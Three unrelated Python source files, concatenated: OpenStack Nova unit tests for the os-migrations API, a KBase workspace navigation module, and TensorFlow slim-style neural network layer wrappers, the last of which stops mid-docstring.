'source_compute': 'host1', 'hidden': '0',
'migration_type': 'resize'}
# python-novaclient actually supports sending this even though it's
# not used in the DB API layer and is totally useless. This lets us,
# however, test that additionalProperties=True allows it.
unknown_filter = {'cell_name': 'ChildCell'}
self.req.GET.update(filters)
self.req.GET.update(unknown_filter)
with mock.patch.object(self.controller.compute_api,
'get_migrations',
return_value=migrations_obj) as (
mock_get_migrations
):
response = self.controller.index(self.req)
self.assertEqual(migrations_in_progress, response)
# Only with the filters, and the unknown filter is stripped
mock_get_migrations.assert_called_once_with(self.context, filters)
def test_index_query_allow_negative_int_as_string(self):
migrations = {'migrations': self._migrations_output()}
filters = ['host', 'status', 'cell_name', 'instance_uuid',
'source_compute', 'hidden', 'migration_type']
with mock.patch.object(self.controller.compute_api,
'get_migrations',
return_value=migrations_obj):
for fl in filters:
req = fakes.HTTPRequest.blank('/os-migrations',
use_admin_context=True,
query_string='%s=-1' % fl)
response = self.controller.index(req)
self.assertEqual(migrations, response)
def test_index_query_duplicate_query_parameters(self):
migrations = {'migrations': self._migrations_output()}
params = {'host': 'host1', 'status': 'migrating',
'cell_name': 'ChildCell', 'instance_uuid': uuids.instance1,
'source_compute': 'host1', 'hidden': '0',
'migration_type': 'resize'}
with mock.patch.object(self.controller.compute_api,
'get_migrations',
return_value=migrations_obj):
for k, v in params.items():
req = fakes.HTTPRequest.blank(
'/os-migrations', use_admin_context=True,
query_string='%s=%s&%s=%s' % (k, v, k, v))
response = self.controller.index(req)
self.assertEqual(migrations, response)
class MigrationsTestCaseV223(MigrationsTestCaseV21):
wsgi_api_version = '2.23'
def setUp(self):
"""Run before each test."""
super(MigrationsTestCaseV223, self).setUp()
self.req = fakes.HTTPRequest.blank(
'', version=self.wsgi_api_version, use_admin_context=True)
def test_index(self):
migrations = {'migrations': self.controller._output(
self.req, migrations_obj, True)}
for i, mig in enumerate(migrations['migrations']):
# first item is in-progress live migration
if i == 0:
self.assertIn('links', mig)
else:
self.assertNotIn('links', mig)
self.assertIn('migration_type', mig)
self.assertIn('id', mig)
self.assertNotIn('deleted', mig)
self.assertNotIn('deleted_at', mig)
with mock.patch.object(self.controller.compute_api,
'get_migrations') as m_get:
m_get.return_value = migrations_obj
response = self.controller.index(self.req)
self.assertEqual(migrations, response)
self.assertIn('links', response['migrations'][0])
self.assertIn('migration_type', response['migrations'][0])
class MigrationsTestCaseV259(MigrationsTestCaseV223):
wsgi_api_version = '2.59'
def test_index(self):
migrations = {'migrations': self.controller._output(
self.req, migrations_obj, True, True)}
for i, mig in enumerate(migrations['migrations']):
# first item is in-progress live migration
if i == 0:
self.assertIn('links', mig)
else:
self.assertNotIn('links', mig)
self.assertIn('migration_type', mig)
self.assertIn('id', mig)
self.assertIn('uuid', mig)
self.assertNotIn('deleted', mig)
self.assertNotIn('deleted_at', mig)
with mock.patch.object(self.controller.compute_api,
'get_migrations_sorted') as m_get:
m_get.return_value = migrations_obj
response = self.controller.index(self.req)
self.assertEqual(migrations, response)
self.assertIn('links', response['migrations'][0])
self.assertIn('migration_type', response['migrations'][0])
@mock.patch('nova.compute.api.API.get_migrations_sorted')
def test_index_with_invalid_marker(self, mock_migrations_get):
"""Tests detail paging with an invalid marker (not found)."""
mock_migrations_get.side_effect = exception.MarkerNotFound(
marker=uuids.invalid_marker)
req = fakes.HTTPRequest.blank(
'/os-migrations?marker=%s' % uuids.invalid_marker,
version=self.wsgi_api_version, use_admin_context=True)
e = self.assertRaises(exc.HTTPBadRequest,
self.controller.index, req)
self.assertEqual(
"Marker %s could not be found." % uuids.invalid_marker,
six.text_type(e))
def test_index_with_invalid_limit(self):
"""Tests detail paging with an invalid limit."""
req = fakes.HTTPRequest.blank(
'/os-migrations?limit=x', version=self.wsgi_api_version,
use_admin_context=True)
self.assertRaises(exception.ValidationError,
self.controller.index, req)
req = fakes.HTTPRequest.blank(
'/os-migrations?limit=-1', version=self.wsgi_api_version,
use_admin_context=True)
self.assertRaises(exception.ValidationError,
self.controller.index, req)
def test_index_with_invalid_changes_since(self):
"""Tests detail paging with an invalid changes-since value."""
req = fakes.HTTPRequest.blank(
'/os-migrations?changes-since=wrong_time',
version=self.wsgi_api_version, use_admin_context=True)
self.assertRaises(exception.ValidationError,
self.controller.index, req)
def test_index_with_unknown_query_param(self):
"""Tests detail paging with an unknown query parameter."""
req = fakes.HTTPRequest.blank(
'/os-migrations?foo=bar',
version=self.wsgi_api_version, use_admin_context=True)
ex = self.assertRaises(exception.ValidationError,
self.controller.index, req)
self.assertIn('Additional properties are not allowed',
six.text_type(ex))
@mock.patch('nova.compute.api.API.get_migrations',
return_value=objects.MigrationList())
def test_index_with_changes_since_old_microversion(self, get_migrations):
"""Tests that the changes-since query parameter is ignored before
microversion 2.59.
"""
# Also use a valid filter (instance_uuid) to make sure only
# changes-since is removed.
req = fakes.HTTPRequest.blank(
'/os-migrations?changes-since=2018-01-10T16:59:24.138939&'
'instance_uuid=%s' % uuids.instance_uuid,
version='2.58', use_admin_context=True)
result = self.controller.index(req)
self.assertEqual({'migrations': []}, result)
get_migrations.assert_called_once_with(
req.environ['nova.context'],
{'instance_uuid': uuids.instance_uuid})
class MigrationTestCaseV266(MigrationsTestCaseV259):
wsgi_api_version = '2.66'
def test_index_with_invalid_changes_before(self):
"""Tests detail paging with an invalid changes-before value."""
req = fakes.HTTPRequest.blank(
'/os-migrations?changes-before=wrong_time',
version=self.wsgi_api_version, use_admin_context=True)
self.assertRaises(exception.ValidationError,
self.controller.index, req)
@mock.patch('nova.compute.api.API.get_migrations_sorted',
return_value=objects.MigrationList())
def test_index_with_changes_since_and_changes_before(
self, get_migrations_sorted):
changes_since = '2013-10-22T13:42:02Z'
changes_before = '2013-10-22T13:42:03Z'
req = fakes.HTTPRequest.blank(
'/os-migrations?changes-since=%s&changes-before=%s&'
'instance_uuid=%s'
% (changes_since, changes_before, uuids.instance_uuid),
version=self.wsgi_api_version,
use_admin_context=True)
self.controller.index(req)
search_opts = {'instance_uuid': uuids.instance_uuid,
'changes-before':
datetime.datetime(2013, 10, 22, 13, 42, 3,
tzinfo=iso8601.iso8601.UTC),
'changes-since':
datetime.datetime(2013, 10, 22, 13, 42, 2,
tzinfo=iso8601.iso8601.UTC)}
get_migrations_sorted.assert_called_once_with(
req.environ['nova.context'], search_opts, sort_dirs=mock.ANY,
sort_keys=mock.ANY, limit=1000, marker=None)
def test_get_migrations_filters_with_distinct_changes_time_bad_request(
self):
changes_since = '2018-09-04T05:45:27Z'
changes_before = '2018-09-03T05:45:27Z'
req = fakes.HTTPRequest.blank('/os-migrations?'
'changes-since=%s&changes-before=%s' %
(changes_since, changes_before),
version=self.wsgi_api_version,
use_admin_context=True)
ex = self.assertRaises(exc.HTTPBadRequest, self.controller.index, req)
self.assertIn('The value of changes-since must be less than '
'or equal to changes-before', six.text_type(ex))
def test_index_with_changes_before_old_microversion_failed(self):
"""Tests that the changes-before query parameter is an error before
microversion 2.66.
"""
# Also use a valid filter (instance_uuid) to make sure
# changes-before is an additional property.
req = fakes.HTTPRequest.blank(
'/os-migrations?changes-before=2018-01-10T16:59:24.138939&'
'instance_uuid=%s' % uuids.instance_uuid,
version='2.65', use_admin_context=True)
ex = self.assertRaises(exception.ValidationError,
self.controller.index, req)
self.assertIn('Additional properties are not allowed',
six.text_type(ex))
@mock.patch('nova.compute.api.API.get_migrations',
return_value=objects.MigrationList())
def test_index_with_changes_before_old_microversion(self, get_migrations):
"""Tests that the changes-before query parameter is ignored before
microversion 2.59.
"""
# Also use a valid filter (instance_uuid) to make sure only
# changes-before is removed.
req = fakes.HTTPRequest.blank(
'/os-migrations?changes-before=2018-01-10T16:59:24.138939&'
'instance_uuid=%s' % uuids.instance_uuid,
version='2.58', use_admin_context=True)
result = self.controller.index(req)
self.assertEqual({'migrations': []}, result)
get_migrations.assert_called_once_with(
req.environ['nova.context'],
{'instance_uuid': uuids.instance_uuid})
class MigrationsTestCaseV280(MigrationTestCaseV266):
wsgi_api_version = '2.80'
def test_index(self):
migrations = {'migrations': self.controller._output(
self.req, migrations_obj,
add_link=True, add_uuid=True,
add_user_project=True)}
for i, mig in enumerate(migrations['migrations']):
# first item is in-progress live migration
if i == 0:
self.assertIn('links', mig)
else:
self.assertNotIn('links', mig)
self.assertIn('migration_type', mig)
self.assertIn('id', mig)
self.assertIn('uuid', mig)
self.assertIn('user_id', mig)
self.assertIn('project_id', mig)
self.assertNotIn('deleted', mig)
self.assertNotIn('deleted_at', mig)
with mock.patch.object(self.controller.compute_api,
'get_migrations_sorted') as m_get:
m_get.return_value = migrations_obj
response = self.controller.index(self.req)
self.assertEqual(migrations, response)
self.assertIn('links', response['migrations'][0])
self.assertIn('migration_type', response['migrations'][0])
def test_index_filter_by_user_id_pre_v280(self):
"""Tests that the migrations by user_id query parameter
is not allowed before microversion 2.80.
"""
req = fakes.HTTPRequest.blank(
'/os-migrations?user_id=%s' % uuids.user_id,
version='2.79', use_admin_context=True)
ex = self.assertRaises(exception.ValidationError,
self.controller.index, req)
self.assertIn('Additional properties are not allowed',
six.text_type(ex))
def test_index_filter_by_project_id_pre_v280(self):
"""Tests that the migrations by project_id query parameter
is not allowed before microversion 2.80.
"""
req = fakes.HTTPRequest.blank(
'/os-migrations?project_id=%s' % uuids.project_id,
version='2.79', use_admin_context=True)
ex = self.assertRaises(exception.ValidationError,
self.controller.index, req)
self.assertIn('Additional properties are not allowed',
six.text_type(ex))
class MigrationsPolicyEnforcement(test.NoDBTestCase):
def setUp(self):
super(MigrationsPolicyEnforcement, self).setUp()
self.controller = migrations_v21.MigrationsController()
self.req = fakes.HTTPRequest.blank('')
def test_list_policy_failed(self):
rule_name = "os_compute_api:os-migrations:index"
self.policy.set_rules({rule_name: "project_id:non_fake"})
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.index, self.req)
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
class MigrationsPolicyEnforcementV223(MigrationsPolicyEnforcement):
wsgi_api_version = '2.23'
def setUp(self):
super(MigrationsPolicyEnforcementV223, self).setUp()
self.req = fakes.HTTPRequest.blank('', version=self.wsgi_api_version)
class MigrationsPolicyEnforcementV259(MigrationsPolicyEnforcementV223):
wsgi_api_version = '2.59'
class MigrationsPolicyEnforcementV280(MigrationsPolicyEnforcementV259):
wsgi_api_version = '2.80'
|
|
"""
Navigation of object containers (e.g. workspaces).
The primary class is 'Finder'::
from doekbase.data_api import nav
finder = nav.Finder(...) # see class docs for args and usage
"""
__author__ = 'Dan Gunter <dkgunter@lbl.gov>'
__date__ = '7/30/15'
# System
from collections import namedtuple
import glob
import os
import re
# Local
import doekbase
import doekbase.workspace.client
# the types module is being removed:
#from doekbase.data_api.types import get_object_class
def get_object_class(type_pattern):
# XXX: This should return the class for a given type pattern
return None
def add_dicts(a, b):
"""Add two dictionaries together and return a third."""
c = a.copy()
c.update(b)
return c
## Simple attribute-access wrapper for the object_metadata returned by the workspace API
_ObjectInfo = namedtuple('_ObjectInfo',
'objid,name,type,save_date,version,saved_by,wsid,'
'workspace,chsum,size,meta')
class ObjectInfo(_ObjectInfo):
"""Metadata about one object."""
def set_conn(self, conn):
self._conn = conn
return self # for chaining
@property
def data(self):
"""Get full, raw, data from its metadata."""
return self._conn.get_object(self.objid)
@property
def object(self):
"""Get wrapped KBase data object from the metadata."""
clazz = get_object_class(self.type)
if clazz is None:
            raise RuntimeError('Internal error: Cannot get any class '
                               'for type "{}"'.format(self.type))
kwparams = self._conn.get_objectapi_params(self.objid)
return clazz(**kwparams)
class DBConnection(object):
"""Database connection."""
DEFAULT_WS_URL = 'https://ci.kbase.us/services/ws/'
DEFAULT_SHOCK_URL = 'https://ci.kbase.us/services/shock-api/'
def __init__(self, workspace=None, auth_token=None, ws_url=None, shock_url=None):
if workspace is None:
raise ValueError("Workspace id, e.g. 1003, required")
try:
self._ws = int(workspace)
self._ws_param = {'ids': [self._ws]}
except ValueError:
raise ValueError("Workspace id must be an integer")
if auth_token is None:
try:
varname = 'KB_AUTH_TOKEN'
auth_token = os.environ[varname]
            except KeyError:
raise ValueError('Unable to authorize. No '
'value given for auth_token and '
'environment variable {} not found'.
format(varname))
if ws_url is None:
ws_url = self.DEFAULT_WS_URL
if shock_url is None:
shock_url = self.DEFAULT_SHOCK_URL
self._ws_url = ws_url
self._shock_url = shock_url
self.client = doekbase.workspace.client.Workspace(ws_url,
token=auth_token)
def get_objectapi_params(self, objid):
"""Get back the params that the Data ctor wants, as
a dictionary with the correct keyword arguments set.
"""
return dict(services={'workspace_service_url': self._ws_url,
'shock_service_url': self._shock_url},
ref='{}/{}'.format(self._ws, objid))
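    # e.g. for workspace 1003 and objid 42 this returns (URLs come from the
    # connection's ws_url/shock_url):
    #   {'services': {'workspace_service_url': ..., 'shock_service_url': ...},
    #    'ref': '1003/42'}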
def get_workspace(self):
return str(self._ws)
def list_objects(self):
"""List all objects in workspace.
Return:
list of ObjectInfo
"""
objlist = self.client.list_objects(self._ws_param)
return [ObjectInfo._make(o).set_conn(self) for o in objlist]
def get_object(self, objid):
"""Get an object in the workspace.
TODO: Make this work!!
"""
oid = {'wsid': self._ws, 'objid': objid}
params = [oid]
obj = self.client.get_objects(params)
return obj
class Finder(object):
"""Find objects.
Initialize with a DBConnection object:
f = Finder(DBConnection(workspace=1122))
You can use indexing to look up objects by name:
f['kb|contigset.12523']
The name can contain Unix glob characters (e.g. "*"):
f['Rhodobacter*']
You can also look up objects by position
f[0]
You can look up an object by arbitrary attributes by
passing a dict-like object (anything with an 'items' method) as the index
f[dict(type='KBaseGenomes.ContigSet-2.0')]
Use list() to see all objects:
print(list(f))
"""
def __init__(self, conn, cache=True):
"""Ctor.
Args:
conn - DBConnection object
cache - If True (the default), cache objects and don't
contact the server again. If False, contact the
server every time.
"""
if not hasattr(conn, 'client'):
raise ValueError('Input "conn" parameter does not look like '
'a DBConnection object; no "client" attribute '
'found')
self._client = conn
self._objlist = None
self._force_refresh = not cache
self._ws_name = conn.get_workspace()
self._globmatch = glob.fnmatch.fnmatchcase
def _set_objlist(self):
if self._force_refresh or self._objlist is None:
self._objlist = self._client.list_objects()
def ls(self):
"""List objects in the current container namespace.
Returns:
list of objects, each in the same form returned by the indexing
operations.
"""
return list(self)
def filter(self, objid=None, name=None, name_re=None, type_=None,
type_re=None, type_ver=None, **kw):
"""Return a filtered subset of the contained objects.
Args:
objid (int): Object identifier
name (str): Exact match name
name_re (str): Regular expression match name
type_ (str): Exact match type
type_re (str): Regular expression match type
type_ver (tuple): Match on string type and str version comparator
kw (dict): Names and values, matched as exact strings. If the
name is not in the record, it is ignored.
"""
if name_re is not None and name is not None:
raise ValueError('keywords "name_re" and "name" cannot both be given')
if sum(map(bool, (type_re, type_, type_ver))) > 1:
raise ValueError(
'keywords "type_re", "type", and "type_ver" are exclusive')
result = []
for o in list(self):
if objid is not None:
if o.objid != objid:
continue
if name_re is not None:
if not re.match(name_re, o.name):
continue
elif name is not None:
if name != o.name:
continue
if type_re is not None:
if not re.match(type_re, o.type):
continue
elif type_ is not None:
if type_ != o.type:
continue
kwmatch = True
            for k, v in kw.items():
                if hasattr(o, k):
                    if getattr(o, k) != v:
kwmatch = False
break
if not kwmatch:
continue
result.append(o)
return result
def __getitem__(self, item):
"""Indexing."""
self._set_objlist()
if isinstance(item, int):
return self._objlist[item]
elif hasattr(item, 'items'): # dict-like
for o in self._objlist:
matched = True
for k, v in item.items():
if getattr(o, k, None) != v:
matched = False
break
if matched:
return o
raise KeyError('Object with attributes ({}) not found '
'in workspace {}'.
format(item, self._ws_name))
else:
for o in self._objlist:
if o.name == item:
return o
elif self._globmatch(o.name, item):
return o
raise KeyError('Object with name "{}" not found in workspace {}'.
format(item, self._ws_name))
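# A minimal sketch of Finder lookups, assuming a populated workspace (the
# workspace id, object names and type pattern below are hypothetical):
#
#     f = Finder(DBConnection(workspace=1122))
#     first = f[0]                                     # by position
#     genome = f['Rhodobacter*']                       # by glob pattern
#     contigs = f.filter(type_re=r'KBaseGenomes\..*')  # by type regex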
|
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains convenience wrappers for typical Neural Network TensorFlow layers.
Additionally it maintains a collection with update_ops that need to be
updated after the ops have been computed, for example to update moving means
and moving variances of batch_norm.
Ops that have different behavior during training or eval have an is_training
parameter. Additionally, Ops that contain variables.variable have a trainable
parameter, which controls whether the op's variables are trainable or not.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.python.training import moving_averages
from piecewisecrf.slim import losses
from piecewisecrf.slim import scopes
from piecewisecrf.slim import variables
# Used to keep the update ops done by batch_norm.
UPDATE_OPS_COLLECTION = '_update_ops_'
@scopes.add_arg_scope
def batch_norm(inputs,
decay=0.999,
center=True,
scale=False,
epsilon=0.001,
moving_vars='moving_vars',
activation=None,
is_training=True,
trainable=True,
restore=True,
scope=None,
reuse=None):
"""Adds a Batch Normalization layer.
Args:
inputs: a tensor of size [batch_size, height, width, channels]
or [batch_size, channels].
decay: decay for the moving average.
center: If True, subtract beta. If False, beta is not created and ignored.
scale: If True, multiply by gamma. If False, gamma is
not used. When the next layer is linear (also e.g. ReLU), this can be
disabled since the scaling can be done by the next layer.
epsilon: small float added to variance to avoid dividing by zero.
moving_vars: collection to store the moving_mean and moving_variance.
activation: activation function.
is_training: whether or not the model is in training mode.
trainable: whether or not the variables should be trainable or not.
restore: whether or not the variables should be marked for restore.
scope: Optional scope for variable_op_scope.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
Returns:
a tensor representing the output of the operation.
"""
inputs_shape = inputs.get_shape()
with tf.variable_op_scope([inputs], scope, 'BatchNorm', reuse=reuse):
axis = list(range(len(inputs_shape) - 1))
params_shape = inputs_shape[-1:]
# Allocate parameters for the beta and gamma of the normalization.
beta, gamma = None, None
if center:
beta = variables.variable('beta',
params_shape,
initializer=tf.zeros_initializer,
trainable=trainable,
restore=restore)
if scale:
gamma = variables.variable('gamma',
params_shape,
initializer=tf.ones_initializer,
trainable=trainable,
restore=restore)
# Create moving_mean and moving_variance add them to
# GraphKeys.MOVING_AVERAGE_VARIABLES collections.
moving_collections = [moving_vars, tf.GraphKeys.MOVING_AVERAGE_VARIABLES]
moving_mean = variables.variable('moving_mean',
params_shape,
initializer=tf.zeros_initializer,
trainable=False,
restore=restore,
collections=moving_collections)
moving_variance = variables.variable('moving_variance',
params_shape,
initializer=tf.ones_initializer,
trainable=False,
restore=restore,
collections=moving_collections)
if is_training:
# Calculate the moments based on the individual batch.
mean, variance = tf.nn.moments(inputs, axis)
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay)
tf.add_to_collection(UPDATE_OPS_COLLECTION, update_moving_mean)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay)
tf.add_to_collection(UPDATE_OPS_COLLECTION, update_moving_variance)
else:
# Just use the moving_mean and moving_variance.
mean = moving_mean
variance = moving_variance
# Normalize the activations.
if is_training:
with tf.control_dependencies([update_moving_mean, update_moving_variance]):
outputs = tf.nn.batch_normalization(
inputs, mean, variance, beta, gamma, epsilon)
outputs.set_shape(inputs.get_shape())
if activation:
outputs = activation(outputs)
return outputs
else:
outputs = tf.nn.batch_normalization(
inputs, mean, variance, beta, gamma, epsilon)
outputs.set_shape(inputs.get_shape())
if activation:
outputs = activation(outputs)
return outputs
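# A minimal usage sketch (the `conv_output` tensor is hypothetical); during
# training the moving statistics are updated via the ops collected in
# UPDATE_OPS_COLLECTION:
#
#   net = batch_norm(conv_output, decay=0.99, is_training=True, scope='bn1')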
def _two_element_tuple(int_or_tuple):
"""Converts `int_or_tuple` to height, width.
Several of the functions that follow accept arguments as either
a tuple of 2 integers or a single integer. A single integer
indicates that the 2 values of the tuple are the same.
  This function normalizes the input value by always returning a tuple.
Args:
int_or_tuple: A list of 2 ints, a single int or a tf.TensorShape.
Returns:
A tuple with 2 values.
Raises:
    ValueError: If `int_or_tuple` is not well formed.
"""
if isinstance(int_or_tuple, (list, tuple)):
if len(int_or_tuple) != 2:
raise ValueError('Must be a list with 2 elements: %s' % int_or_tuple)
return int(int_or_tuple[0]), int(int_or_tuple[1])
if isinstance(int_or_tuple, int):
return int(int_or_tuple), int(int_or_tuple)
if isinstance(int_or_tuple, tf.TensorShape):
if len(int_or_tuple) == 2:
return int_or_tuple[0], int_or_tuple[1]
raise ValueError('Must be an int, a list with 2 elements or a TensorShape of '
'length 2')
@scopes.add_arg_scope
def conv2d(inputs,
num_filters_out,
kernel_size,
stride=1,
padding='SAME',
activation=tf.nn.relu,
stddev=0.01,
bias=0.0,
weight_decay=0,
batch_norm_params=None,
is_training=True,
trainable=True,
restore=True,
scope=None,
reuse=None,
init=None):
"""Adds a 2D convolution followed by an optional batch_norm layer.
conv2d creates a variable called 'weights', representing the convolutional
kernel, that is convolved with the input. If `batch_norm_params` is None, a
second variable called 'biases' is added to the result of the convolution
operation.
Args:
inputs: a tensor of size [batch_size, height, width, channels].
num_filters_out: the number of output filters.
    kernel_size: a list of length 2: [kernel_height, kernel_width] of
      the filters. Can be an int if both values are the same.
stride: a list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: one of 'VALID' or 'SAME'.
activation: activation function.
    stddev: standard deviation of the truncated Gaussian weight distribution.
bias: the initial value of the biases.
weight_decay: the weight decay.
    batch_norm_params: parameters for the batch_norm. If None, batch_norm is not used.
is_training: whether or not the model is in training mode.
trainable: whether or not the variables should be trainable or not.
restore: whether or not the variables should be marked for restore.
scope: Optional scope for variable_op_scope.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
Returns:
a tensor representing the output of the operation.
"""
with tf.variable_op_scope([inputs], scope, 'Conv', reuse=reuse):
kernel_h, kernel_w = _two_element_tuple(kernel_size)
stride_h, stride_w = _two_element_tuple(stride)
num_filters_in = inputs.get_shape()[-1]
weights_shape = [kernel_h, kernel_w,
num_filters_in, num_filters_out]
weights_initializer = None
    if init is None:
weights_initializer = tf.truncated_normal_initializer(stddev=stddev)
else:
weights_initializer = tf.constant(init['weights'])
weights_shape = None
l2_regularizer = None
if weight_decay and weight_decay > 0:
l2_regularizer = losses.l2_regularizer(weight_decay)
weights = variables.variable('weights',
shape=weights_shape,
initializer=weights_initializer,
regularizer=l2_regularizer,
trainable=trainable,
restore=restore)
conv = tf.nn.conv2d(inputs, weights, [1, stride_h, stride_w, 1],
padding=padding)
if batch_norm_params is not None:
with scopes.arg_scope([batch_norm], is_training=is_training,
trainable=trainable, restore=restore):
outputs = batch_norm(conv, **batch_norm_params)
else:
bias_shape = [num_filters_out,]
bias_initializer = None
      if init is None:
bias_initializer = tf.constant_initializer(bias)
else:
bias_initializer = tf.constant(init['biases'])
bias_shape = None
biases = variables.variable('biases',
shape=bias_shape,
initializer=bias_initializer,
trainable=trainable,
restore=restore)
outputs = tf.nn.bias_add(conv, biases)
if activation:
outputs = activation(outputs)
return outputs
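# A minimal usage sketch (hypothetical `images` tensor of shape
# [batch, height, width, 3]) combining weight decay and batch normalization:
#
#   net = conv2d(images, 64, [3, 3], stride=1, weight_decay=0.0005,
#                batch_norm_params={'decay': 0.99}, scope='conv1')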
@scopes.add_arg_scope
def fc(inputs,
num_units_out,
activation=tf.nn.relu,
stddev=0.01,
bias=0.0,
weight_decay=0,
batch_norm_params=None,
is_training=True,
trainable=True,
restore=True,
scope=None,
reuse=None):
"""Adds a fully connected layer followed by an optional batch_norm layer.
FC creates a variable called 'weights', representing the fully connected
weight matrix, that is multiplied by the input. If `batch_norm` is None, a
second variable called 'biases' is added to the result of the initial
vector-matrix multiplication.
Args:
inputs: a [B x N] tensor where B is the batch size and N is the number of
input units in the layer.
num_units_out: the number of output units in the layer.
activation: activation function.
stddev: the standard deviation for the weights.
bias: the initial value of the biases.
weight_decay: the weight decay.
    batch_norm_params: parameters for the batch_norm. If None, batch_norm is not used.
is_training: whether or not the model is in training mode.
trainable: whether or not the variables should be trainable or not.
restore: whether or not the variables should be marked for restore.
scope: Optional scope for variable_op_scope.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
Returns:
the tensor variable representing the result of the series of operations.
"""
with tf.variable_op_scope([inputs], scope, 'FC', reuse=reuse):
num_units_in = inputs.get_shape()[1]
weights_shape = [num_units_in, num_units_out]
weights_initializer = tf.truncated_normal_initializer(stddev=stddev)
l2_regularizer = None
if weight_decay and weight_decay > 0:
l2_regularizer = losses.l2_regularizer(weight_decay)
weights = variables.variable('weights',
shape=weights_shape,
initializer=weights_initializer,
regularizer=l2_regularizer,
trainable=trainable,
restore=restore)
if batch_norm_params is not None:
outputs = tf.matmul(inputs, weights)
with scopes.arg_scope([batch_norm], is_training=is_training,
trainable=trainable, restore=restore):
outputs = batch_norm(outputs, **batch_norm_params)
else:
bias_shape = [num_units_out,]
bias_initializer = tf.constant_initializer(bias)
biases = variables.variable('biases',
shape=bias_shape,
initializer=bias_initializer,
trainable=trainable,
restore=restore)
outputs = tf.nn.xw_plus_b(inputs, weights, biases)
if activation:
outputs = activation(outputs)
return outputs
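# A minimal usage sketch (hypothetical flattened `features` tensor and
# `num_classes` value):
#
#   net = fc(features, 512, weight_decay=0.0005, scope='fc1')
#   logits = fc(net, num_classes, activation=None, scope='logits')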
def one_hot_encoding(labels, num_classes, scope=None):
"""Transform numeric labels into onehot_labels.
Args:
labels: [batch_size] target labels.
num_classes: total number of classes.
scope: Optional scope for op_scope.
Returns:
one hot encoding of the labels.
"""
with tf.op_scope([labels], scope, 'OneHotEncoding'):
batch_size = labels.get_shape()[0]
indices = tf.expand_dims(tf.range(0, batch_size), 1)
labels = tf.cast(tf.expand_dims(labels, 1), indices.dtype)
concated = tf.concat(1, [indices, labels])
onehot_labels = tf.sparse_to_dense(
concated, tf.pack([batch_size, num_classes]), 1.0, 0.0)
onehot_labels.set_shape([batch_size, num_classes])
return onehot_labels
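# A brief sketch of the expected output (illustrative labels only):
#
#   labels = tf.constant([0, 2, 1])
#   one_hot = one_hot_encoding(labels, num_classes=3)
#   # evaluates to [[1, 0, 0], [0, 0, 1], [0, 1, 0]]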
@scopes.add_arg_scope
def max_pool(inputs, kernel_size, stride=2, padding='VALID', scope=None):
"""Adds a Max Pooling layer.
It is assumed by the wrapper that the pooling is only done per image and not
in depth or batch.
Args:
inputs: a tensor of size [batch_size, height, width, depth].
kernel_size: a list of length 2: [kernel_height, kernel_width] of the
pooling kernel over which the op is computed. Can be an int if both
values are the same.
stride: a list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: the padding method, either 'VALID' or 'SAME'.
scope: Optional scope for op_scope.
Returns:
a tensor representing the results of the pooling operation.
Raises:
ValueError: if 'kernel_size' is not a 2-D list
"""
with tf.op_scope([inputs], scope, 'MaxPool'):
kernel_h, kernel_w = _two_element_tuple(kernel_size)
stride_h, stride_w = _two_element_tuple(stride)
return tf.nn.max_pool(inputs,
ksize=[1, kernel_h, kernel_w, 1],
strides=[1, stride_h, stride_w, 1],
padding=padding)
@scopes.add_arg_scope
def avg_pool(inputs, kernel_size, stride=2, padding='VALID', scope=None):
"""Adds a Avg Pooling layer.
It is assumed by the wrapper that the pooling is only done per image and not
in depth or batch.
Args:
inputs: a tensor of size [batch_size, height, width, depth].
kernel_size: a list of length 2: [kernel_height, kernel_width] of the
pooling kernel over which the op is computed. Can be an int if both
values are the same.
stride: a list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: the padding method, either 'VALID' or 'SAME'.
scope: Optional scope for op_scope.
Returns:
a tensor representing the results of the pooling operation.
"""
with tf.op_scope([inputs], scope, 'AvgPool'):
kernel_h, kernel_w = _two_element_tuple(kernel_size)
stride_h, stride_w = _two_element_tuple(stride)
return tf.nn.avg_pool(inputs,
ksize=[1, kernel_h, kernel_w, 1],
strides=[1, stride_h, stride_w, 1],
padding=padding)
@scopes.add_arg_scope
def dropout(inputs, keep_prob=0.5, is_training=True, scope=None):
"""Returns a dropout layer applied to the input.
Args:
inputs: the tensor to pass to the Dropout layer.
keep_prob: the probability of keeping each input unit.
is_training: whether or not the model is in training mode. If so, dropout is
applied and values scaled. Otherwise, inputs is returned.
scope: Optional scope for op_scope.
Returns:
a tensor representing the output of the operation.
"""
if is_training and keep_prob > 0:
with tf.op_scope([inputs], scope, 'Dropout'):
return tf.nn.dropout(inputs, keep_prob)
else:
return inputs
def flatten(inputs, scope=None):
"""Flattens the input while maintaining the batch_size.
Assumes that the first dimension represents the batch.
Args:
inputs: a tensor of size [batch_size, ...].
scope: Optional scope for op_scope.
Returns:
a flattened tensor with shape [batch_size, k].
Raises:
ValueError: if inputs.shape is wrong.
"""
if len(inputs.get_shape()) < 2:
    raise ValueError('Inputs must have at least 2 dimensions')
dims = inputs.get_shape()[1:]
k = dims.num_elements()
with tf.op_scope([inputs], scope, 'Flatten'):
return tf.reshape(inputs, [-1, k])
def repeat_op(repetitions, inputs, op, *args, **kwargs):
"""Build a sequential Tower starting from inputs by using an op repeatedly.
It creates new scopes for each operation by increasing the counter.
Example: given repeat_op(3, _, ops.conv2d, 64, [3, 3], scope='conv1')
it will repeat the given op under the following variable_scopes:
conv1/Conv
conv1/Conv_1
conv1/Conv_2
Args:
    repetitions: number of repetitions.
